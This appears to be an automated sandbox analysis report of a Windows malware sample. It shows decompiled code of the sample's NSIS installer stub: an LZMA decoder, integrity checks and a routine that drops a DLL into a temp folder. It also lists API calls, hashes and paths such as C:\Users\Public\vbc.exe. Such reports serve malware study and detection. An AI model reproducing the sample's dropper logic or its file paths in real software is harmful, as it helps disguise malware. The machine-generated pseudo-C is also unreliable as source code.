                              							__eflags =  *(__ebp - 0x48);
                              							if( *(__ebp - 0x48) <= 0) {
                              								__ecx =  *(__ebp - 0x40);
                              								__ebx =  *(__ebp - 0x50);
                              								0 = 1;
                              								__eax = 1 << __cl;
                              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                              								__eax =  *(__ebp - 0x7c);
                              								 *(__ebp - 0x44) = __ebx;
                              								goto L140;
                              							}
                              							__eax =  *(__ebp - 0x50);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              							__eax =  *(__ebp - 0x58);
                              							__esi = __edx + __eax;
                              							 *(__ebp - 0x54) = __esi;
                              							__ax =  *__esi;
                              							__edi = __ax & 0x0000ffff;
                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              							__eflags =  *(__ebp - 0xc) - __ecx;
                              							if( *(__ebp - 0xc) >= __ecx) {
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              								__cx = __ax;
                              								__cx = __ax >> 5;
                              								__eax = __eax - __ecx;
                              								__edx = __edx + 1;
                              								__eflags = __edx;
                              								 *__esi = __ax;
                              								 *(__ebp - 0x50) = __edx;
                              							} else {
                              								 *(__ebp - 0x10) = __ecx;
                              								0x800 = 0x800 - __edi;
                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              								 *__esi = __cx;
                              							}
                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                              							if( *(__ebp - 0x10) >= 0x1000000) {
                              								goto L148;
                              							} else {
                              								goto L146;
                              							}
                              						case 0x19:
                              							__eflags = __ebx - 4;
                              							if(__ebx < 4) {
                              								 *(__ebp - 0x2c) = __ebx;
                              								L119:
                              								_t393 = __ebp - 0x2c;
                              								 *_t393 =  *(__ebp - 0x2c) + 1;
                              								__eflags =  *_t393;
                              								L120:
                              								__eax =  *(__ebp - 0x2c);
                              								__eflags = __eax;
                              								if(__eax == 0) {
                              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                              									goto L170;
                              								}
                              								__eflags = __eax -  *(__ebp - 0x60);
                              								if(__eax >  *(__ebp - 0x60)) {
                              									goto L171;
                              								}
                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                              								__eax =  *(__ebp - 0x30);
                              								_t400 = __ebp - 0x60;
                              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                              								__eflags =  *_t400;
                              								goto L123;
                              							}
                              							__ecx = __ebx;
                              							__eax = __ebx;
                              							__ecx = __ebx >> 1;
                              							__eax = __ebx & 0x00000001;
                              							__ecx = (__ebx >> 1) - 1;
                              							__al = __al | 0x00000002;
                              							__eax = (__ebx & 0x00000001) << __cl;
                              							__eflags = __ebx - 0xe;
                              							 *(__ebp - 0x2c) = __eax;
                              							if(__ebx >= 0xe) {
                              								__ebx = 0;
                              								 *(__ebp - 0x48) = __ecx;
                              								L102:
                              								__eflags =  *(__ebp - 0x48);
                              								if( *(__ebp - 0x48) <= 0) {
                              									__eax = __eax + __ebx;
                              									 *(__ebp - 0x40) = 4;
                              									 *(__ebp - 0x2c) = __eax;
                              									__eax =  *(__ebp - 4);
                              									__eax =  *(__ebp - 4) + 0x644;
                              									__eflags = __eax;
                              									L108:
                              									__ebx = 0;
                              									 *(__ebp - 0x58) = __eax;
                              									 *(__ebp - 0x50) = 1;
                              									 *(__ebp - 0x44) = 0;
                              									 *(__ebp - 0x48) = 0;
                              									L112:
                              									__eax =  *(__ebp - 0x40);
                              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                              										_t391 = __ebp - 0x2c;
                              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                              										__eflags =  *_t391;
                              										goto L119;
                              									}
                              									__eax =  *(__ebp - 0x50);
                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              									__eax =  *(__ebp - 0x58);
                              									__esi = __edi + __eax;
                              									 *(__ebp - 0x54) = __esi;
                              									__ax =  *__esi;
                              									__ecx = __ax & 0x0000ffff;
                              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                              									__eflags =  *(__ebp - 0xc) - __edx;
                              									if( *(__ebp - 0xc) >= __edx) {
                              										__ecx = 0;
                              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                              										__ecx = 1;
                              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                              										__ebx = 1;
                              										__ecx =  *(__ebp - 0x48);
                              										__ebx = 1 << __cl;
                              										__ecx = 1 << __cl;
                              										__ebx =  *(__ebp - 0x44);
                              										__ebx =  *(__ebp - 0x44) | __ecx;
                              										__cx = __ax;
                              										__cx = __ax >> 5;
                              										__eax = __eax - __ecx;
                              										__edi = __edi + 1;
                              										__eflags = __edi;
                              										 *(__ebp - 0x44) = __ebx;
                              										 *__esi = __ax;
                              										 *(__ebp - 0x50) = __edi;
                              									} else {
                              										 *(__ebp - 0x10) = __edx;
                              										0x800 = 0x800 - __ecx;
                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              										 *__esi = __dx;
                              									}
                              									__eflags =  *(__ebp - 0x10) - 0x1000000;
                              									if( *(__ebp - 0x10) >= 0x1000000) {
                              										L111:
                              										_t368 = __ebp - 0x48;
                              										 *_t368 =  *(__ebp - 0x48) + 1;
                              										__eflags =  *_t368;
                              										goto L112;
                              									} else {
                              										goto L109;
                              									}
                              								}
                              								__ecx =  *(__ebp - 0xc);
                              								__ebx = __ebx + __ebx;
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              								 *(__ebp - 0x44) = __ebx;
                              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                              									__ecx =  *(__ebp - 0x10);
                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              									__ebx = __ebx | 0x00000001;
                              									__eflags = __ebx;
                              									 *(__ebp - 0x44) = __ebx;
                              								}
                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                              								if( *(__ebp - 0x10) >= 0x1000000) {
                              									L101:
                              									_t338 = __ebp - 0x48;
                              									 *_t338 =  *(__ebp - 0x48) - 1;
                              									__eflags =  *_t338;
                              									goto L102;
                              								} else {
                              									goto L99;
                              								}
                              							}
                              							__edx =  *(__ebp - 4);
                              							__eax = __eax - __ebx;
                              							 *(__ebp - 0x40) = __ecx;
                              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                              							goto L108;
                              						case 0x1a:
                              							goto L55;
                              						case 0x1b:
                              							L75:
                              							__eflags =  *(__ebp - 0x64);
                              							if( *(__ebp - 0x64) == 0) {
                              								 *(__ebp - 0x88) = 0x1b;
                              								goto L170;
                              							}
                              							__eax =  *(__ebp - 0x14);
                              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              							__eflags = __eax -  *(__ebp - 0x74);
                              							if(__eax >=  *(__ebp - 0x74)) {
                              								__eax = __eax +  *(__ebp - 0x74);
                              								__eflags = __eax;
                              							}
                              							__edx =  *(__ebp - 8);
                              							__cl =  *(__eax + __edx);
                              							__eax =  *(__ebp - 0x14);
                              							 *(__ebp - 0x5c) = __cl;
                              							 *(__eax + __edx) = __cl;
                              							__eax = __eax + 1;
                              							__edx = 0;
                              							_t274 = __eax %  *(__ebp - 0x74);
                              							__eax = __eax /  *(__ebp - 0x74);
                              							__edx = _t274;
                              							__eax =  *(__ebp - 0x68);
                              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              							_t283 = __ebp - 0x64;
                              							 *_t283 =  *(__ebp - 0x64) - 1;
                              							__eflags =  *_t283;
                              							 *( *(__ebp - 0x68)) = __cl;
                              							goto L79;
                              						case 0x1c:
                              							while(1) {
                              								L123:
                              								__eflags =  *(__ebp - 0x64);
                              								if( *(__ebp - 0x64) == 0) {
                              									break;
                              								}
                              								__eax =  *(__ebp - 0x14);
                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              								__eflags = __eax -  *(__ebp - 0x74);
                              								if(__eax >=  *(__ebp - 0x74)) {
                              									__eax = __eax +  *(__ebp - 0x74);
                              									__eflags = __eax;
                              								}
                              								__edx =  *(__ebp - 8);
                              								__cl =  *(__eax + __edx);
                              								__eax =  *(__ebp - 0x14);
                              								 *(__ebp - 0x5c) = __cl;
                              								 *(__eax + __edx) = __cl;
                              								__eax = __eax + 1;
                              								__edx = 0;
                              								_t414 = __eax %  *(__ebp - 0x74);
                              								__eax = __eax /  *(__ebp - 0x74);
                              								__edx = _t414;
                              								__eax =  *(__ebp - 0x68);
                              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                              								__eflags =  *(__ebp - 0x30);
                              								 *( *(__ebp - 0x68)) = __cl;
                              								 *(__ebp - 0x14) = __edx;
                              								if( *(__ebp - 0x30) > 0) {
                              									continue;
                              								} else {
                              									goto L80;
                              								}
                              							}
                              							 *(__ebp - 0x88) = 0x1c;
                              							goto L170;
                              					}
                              				}
                              			}













                              0x00000000
                              0x00000000
                              0x00406c95
                              0x00406c95
                              0x00406c99
                              0x0040715f
                              0x00000000
                              0x0040715f
                              0x00406c9f
                              0x00406ca2
                              0x00406ca5
                              0x00406ca8
                              0x00406caa
                              0x00406caa
                              0x00406caa
                              0x00406cad
                              0x00406cb0
                              0x00406cb3
                              0x00406cb6
                              0x00406cb9
                              0x00406cbc
                              0x00406cbd
                              0x00406cbf
                              0x00406cbf
                              0x00406cbf
                              0x00406cc2
                              0x00406cc5
                              0x00406cc8
                              0x00406ccb
                              0x00406ccb
                              0x00406ccb
                              0x00406cce
                              0x00000000
                              0x00000000
                              0x00406f12
                              0x00406f12
                              0x00406f12
                              0x00406f16
                              0x00000000
                              0x00000000
                              0x00406f1c
                              0x00406f1f
                              0x00406f22
                              0x00406f25
                              0x00406f27
                              0x00406f27
                              0x00406f27
                              0x00406f2a
                              0x00406f2d
                              0x00406f30
                              0x00406f33
                              0x00406f36
                              0x00406f39
                              0x00406f3a
                              0x00406f3c
                              0x00406f3c
                              0x00406f3c
                              0x00406f3f
                              0x00406f42
                              0x00406f45
                              0x00406f48
                              0x00406f4b
                              0x00406f4f
                              0x00406f51
                              0x00406f54
                              0x00000000
                              0x00406f56
                              0x00000000
                              0x00406f56
                              0x00406f54
                              0x00407189
                              0x00000000
                              0x00000000
                              0x004067b8

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                              • Instruction ID: 6d311f2402807b87ac493386ce59d8e56409eb9bb3693b5a24021ea98ba03221
                              • Opcode Fuzzy Hash: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                              • Instruction Fuzzy Hash: 3AF18571D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED456BB281D3786A86CF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040659C(CHAR* _a4) {
                              				void* _t2;
                              
                              				_t2 = FindFirstFileA(_a4, 0x4225a0); // executed
                              				if(_t2 == 0xffffffff) {
                              					return 0;
                              				}
                              				FindClose(_t2);
                              				return 0x4225a0;
                              			}

                              APIs
                              • FindFirstFileA.KERNELBASE(76712754,004225A0,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,00405CF1,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp,76712754,?,766F13E0,00405A10,?,76712754,766F13E0), ref: 004065A7
                              • FindClose.KERNEL32(00000000), ref: 004065B3
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp, xrefs: 0040659C
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID: C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp
                              • API String ID: 2295610775-2717606532
                              • Opcode ID: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                              • Instruction ID: f69e928bf0ac745f57f8f0961b1e49234d8ba52852923c3f30ba08d6865e50e3
                              • Opcode Fuzzy Hash: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                              • Instruction Fuzzy Hash: 64D01231615130FBC3411B38BE0C84B7A5C9F093303619B36F466F12E4D7748D62869C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E00402EF1(void* __eflags, signed int _a4) {
                              				DWORD* _v8;
                              				DWORD* _v12;
                              				intOrPtr _v16;
                              				long _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				signed int _v40;
                              				char _v300;
                              				signed int _t54;
                              				void* _t62;
                              				intOrPtr _t65;
                              				void* _t68;
                              				intOrPtr* _t70;
                              				intOrPtr _t71;
                              				signed int _t77;
                              				signed int _t82;
                              				signed int _t83;
                              				signed int _t89;
                              				intOrPtr _t92;
                              				long _t94;
                              				signed int _t102;
                              				signed int _t104;
                              				void* _t106;
                              				signed int _t107;
                              				signed int _t110;
                              				intOrPtr* _t111;
                              
                              				_t94 = 0;
                              				_v8 = 0;
                              				_v12 = 0;
                              				 *0x424750 = GetTickCount() + 0x3e8;
                              				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
                              				_t106 = E00405DC1("C:\\Users\\Public\\vbc.exe", 0x80000000, 3);
                              				 *0x40a018 = _t106;
                              				if(_t106 == 0xffffffff) {
                              					return "Error launching installer";
                              				}
                              				E00406228("C:\\Users\\Public", "C:\\Users\\Public\\vbc.exe");
                              				E00406228(0x42c000, E00405C07("C:\\Users\\Public"));
                              				_t54 = GetFileSize(_t106, 0);
                              				__eflags = _t54;
                              				 *0x41f908 = _t54;
                              				_t110 = _t54;
                              				if(_t54 <= 0) {
                              					L24:
                              					E00402E52(1);
                              					__eflags =  *0x424758 - _t94;
                              					if( *0x424758 == _t94) {
                              						goto L32;
                              					}
                              					__eflags = _v12 - _t94;
                              					if(_v12 == _t94) {
                              						L28:
                              						_t111 = GlobalAlloc(0x40, _v20);
                              						E00406756(0x40b870);
                              						E00405DF0( &_v300, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
                              						_t62 = CreateFileA( &_v300, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                              						__eflags = _t62 - 0xffffffff;
                              						 *0x40a01c = _t62;
                              						if(_t62 != 0xffffffff) {
                              							_t65 = E00403419( *0x424758 + 0x1c);
                              							 *0x41f90c = _t65;
                              							 *0x41f900 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                              							_t68 = E00403192(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                              							__eflags = _t68 - _v20;
                              							if(_t68 == _v20) {
                              								__eflags = _v40 & 0x00000001;
                              								 *0x424754 = _t111;
                              								 *0x42475c =  *_t111;
                              								if((_v40 & 0x00000001) != 0) {
                              									 *0x424760 =  *0x424760 + 1;
                              									__eflags =  *0x424760;
                              								}
                              								_t45 = _t111 + 0x44; // 0x44
                              								_t70 = _t45;
                              								_t102 = 8;
                              								do {
                              									_t70 = _t70 - 8;
                              									 *_t70 =  *_t70 + _t111;
                              									_t102 = _t102 - 1;
                              									__eflags = _t102;
                              								} while (_t102 != 0);
                              								_t71 =  *0x41f8fc; // 0x8904f
                              								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
                              								E00405D7C(0x424780, _t111 + 4, 0x40);
                              								__eflags = 0;
                              								return 0;
                              							}
                              							goto L32;
                              						}
                              						return "Error writing temporary file. Make sure your temp folder is valid.";
                              					}
                              					E00403419( *0x41f8f8);
                              					_t77 = E00403403( &_a4, 4);
                              					__eflags = _t77;
                              					if(_t77 == 0) {
                              						goto L32;
                              					}
                              					__eflags = _v8 - _a4;
                              					if(_v8 != _a4) {
                              						goto L32;
                              					}
                              					goto L28;
                              				} else {
                              					do {
                              						_t107 = _t110;
                              						asm("sbb eax, eax");
                              						_t82 = ( ~( *0x424758) & 0x00007e00) + 0x200;
                              						__eflags = _t110 - _t82;
                              						if(_t110 >= _t82) {
                              							_t107 = _t82;
                              						}
                              						_t83 = E00403403(0x4178f8, _t107);
                              						__eflags = _t83;
                              						if(_t83 == 0) {
                              							E00402E52(1);
                              							L32:
                              							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                              						}
                              						__eflags =  *0x424758;
                              						if( *0x424758 != 0) {
                              							__eflags = _a4 & 0x00000002;
                              							if((_a4 & 0x00000002) == 0) {
                              								E00402E52(0);
                              							}
                              							goto L20;
                              						}
                              						E00405D7C( &_v40, 0x4178f8, 0x1c);
                              						_t89 = _v40;
                              						__eflags = _t89 & 0xfffffff0;
                              						if((_t89 & 0xfffffff0) != 0) {
                              							goto L20;
                              						}
                              						__eflags = _v36 - 0xdeadbeef;
                              						if(_v36 != 0xdeadbeef) {
                              							goto L20;
                              						}
                              						__eflags = _v24 - 0x74736e49;
                              						if(_v24 != 0x74736e49) {
                              							goto L20;
                              						}
                              						__eflags = _v28 - 0x74666f73;
                              						if(_v28 != 0x74666f73) {
                              							goto L20;
                              						}
                              						__eflags = _v32 - 0x6c6c754e;
                              						if(_v32 != 0x6c6c754e) {
                              							goto L20;
                              						}
                              						_a4 = _a4 | _t89;
                              						_t104 =  *0x41f8f8; // 0x8237b
                              						 *0x424800 =  *0x424800 | _a4 & 0x00000002;
                              						_t92 = _v16;
                              						__eflags = _t92 - _t110;
                              						 *0x424758 = _t104;
                              						if(_t92 > _t110) {
                              							goto L32;
                              						}
                              						__eflags = _a4 & 0x00000008;
                              						if((_a4 & 0x00000008) != 0) {
                              							L16:
                              							_v12 = _v12 + 1;
                              							_t110 = _t92 - 4;
                              							__eflags = _t107 - _t110;
                              							if(_t107 > _t110) {
                              								_t107 = _t110;
                              							}
                              							goto L20;
                              						}
                              						__eflags = _a4 & 0x00000004;
                              						if((_a4 & 0x00000004) != 0) {
                              							break;
                              						}
                              						goto L16;
                              						L20:
                              						__eflags = _t110 -  *0x41f908; // 0x831db
                              						if(__eflags < 0) {
                              							_v8 = E004066E8(_v8, 0x4178f8, _t107);
                              						}
                              						 *0x41f8f8 =  *0x41f8f8 + _t107;
                              						_t110 = _t110 - _t107;
                              						__eflags = _t110;
                              					} while (_t110 != 0);
                              					_t94 = 0;
                              					__eflags = 0;
                              					goto L24;
                              				}
                              			}

                              APIs
                              • GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402F05
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402F21
                                • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DC5
                                • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                              • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402F6A
                              • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                              • API String ID: 2803837635-1404970732
                              • Opcode ID: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                              • Instruction ID: 41f98d992e8437d8d417f3691d947d8f632b5d0a71237712da2b0bb715ca9b84
                              • Opcode Fuzzy Hash: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                              • Instruction Fuzzy Hash: 1B71E131A00259ABDB20AF64DD85B9E3BACEB44355F20803BF911BA2D1C77C9E418B5C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 003D1739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 003D179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              • Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction ID: aaae4c7363c1a3fcfe9c4a4f832c8f2f854ae64ddbac44a4d92db7fd5e8da345
                              • Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction Fuzzy Hash: DBE15C21D44388EEEB21CBE4EC16BEDBBB5AF04710F10449AE648FE2D1D7B10A84DB15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E00401759(FILETIME* __ebx, void* __eflags) {
                              				void* _t33;
                              				void* _t41;
                              				void* _t43;
                              				FILETIME* _t49;
                              				FILETIME* _t62;
                              				void* _t64;
                              				signed int _t70;
                              				FILETIME* _t71;
                              				FILETIME* _t75;
                              				signed int _t77;
                              				void* _t80;
                              				CHAR* _t82;
                              				CHAR* _t83;
                              				void* _t85;
                              
                              				_t75 = __ebx;
                              				_t82 = E00402BCE(0x31);
                              				 *(_t85 - 8) = _t82;
                              				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                              				_t33 = E00405C2D(_t82);
                              				_push(_t82);
                              				_t83 = "uvlcopdlxoed";
                              				if(_t33 == 0) {
                              					lstrcatA(E00405BC0(E00406228(_t83, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
                              				} else {
                              					E00406228();
                              				}
                              				E00406503(_t83);
                              				while(1) {
                              					__eflags =  *(_t85 + 8) - 3;
                              					if( *(_t85 + 8) >= 3) {
                              						_t64 = E0040659C(_t83);
                              						_t77 = 0;
                              						__eflags = _t64 - _t75;
                              						if(_t64 != _t75) {
                              							_t71 = _t64 + 0x14;
                              							__eflags = _t71;
                              							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                              						}
                              						asm("sbb eax, eax");
                              						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                              						__eflags = _t70;
                              						 *(_t85 + 8) = _t70;
                              					}
                              					__eflags =  *(_t85 + 8) - _t75;
                              					if( *(_t85 + 8) == _t75) {
                              						E00405D9C(_t83);
                              					}
                              					__eflags =  *(_t85 + 8) - 1;
                              					_t41 = E00405DC1(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                              					__eflags = _t41 - 0xffffffff;
                              					 *(_t85 - 0xc) = _t41;
                              					if(_t41 != 0xffffffff) {
                              						break;
                              					}
                              					__eflags =  *(_t85 + 8) - _t75;
                              					if( *(_t85 + 8) != _t75) {
                              						E0040534F(0xffffffe2,  *(_t85 - 8));
                              						__eflags =  *(_t85 + 8) - 2;
                              						if(__eflags == 0) {
                              							 *((intOrPtr*)(_t85 - 4)) = 1;
                              						}
                              						L31:
                              						 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t85 - 4));
                              						__eflags =  *0x4247e8;
                              						goto L32;
                              					} else {
                              						E00406228(0x40ac20, 0x425000);
                              						E00406228(0x425000, _t83);
                              						E004062BB(_t75, 0x40ac20, _t83, "C:\Users\Albus\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll",  *((intOrPtr*)(_t85 - 0x14)));
                              						E00406228(0x425000, 0x40ac20);
                              						_t62 = E00405944("C:\Users\Albus\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll",  *(_t85 - 0x28) >> 3) - 4;
                              						__eflags = _t62;
                              						if(_t62 == 0) {
                              							continue;
                              						} else {
                              							__eflags = _t62 == 1;
                              							if(_t62 == 1) {
                              								 *0x4247e8 =  &( *0x4247e8->dwLowDateTime);
                              								L32:
                              								_t49 = 0;
                              								__eflags = 0;
                              							} else {
                              								_push(_t83);
                              								_push(0xfffffffa);
                              								E0040534F();
                              								L29:
                              								_t49 = 0x7fffffff;
                              							}
                              						}
                              					}
                              					L33:
                              					return _t49;
                              				}
                              				E0040534F(0xffffffea,  *(_t85 - 8));
                              				 *0x424814 =  *0x424814 + 1;
                              				_t43 = E00403192(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                              				 *0x424814 =  *0x424814 - 1;
                              				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                              				_t80 = _t43;
                              				if( *(_t85 - 0x1c) != 0xffffffff) {
                              					L22:
                              					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                              				} else {
                              					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                              					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                              						goto L22;
                              					}
                              				}
                              				CloseHandle( *(_t85 - 0xc)); // executed
                              				__eflags = _t80 - _t75;
                              				if(_t80 >= _t75) {
                              					goto L31;
                              				} else {
                              					__eflags = _t80 - 0xfffffffe;
                              					if(_t80 != 0xfffffffe) {
                              						E004062BB(_t75, _t80, _t83, _t83, 0xffffffee);
                              					} else {
                              						E004062BB(_t75, _t80, _t83, _t83, 0xffffffe9);
                              						lstrcatA(_t83,  *(_t85 - 8));
                              					}
                              					_push(0x200010);
                              					_push(_t83);
                              					E00405944();
                              					goto L29;
                              				}
                              				goto L33;
                              			}


















                              APIs
                              • lstrcatA.KERNEL32(00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                              • CompareFileTime.KERNEL32(-00000014,?,uvlcopdlxoed,uvlcopdlxoed,00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
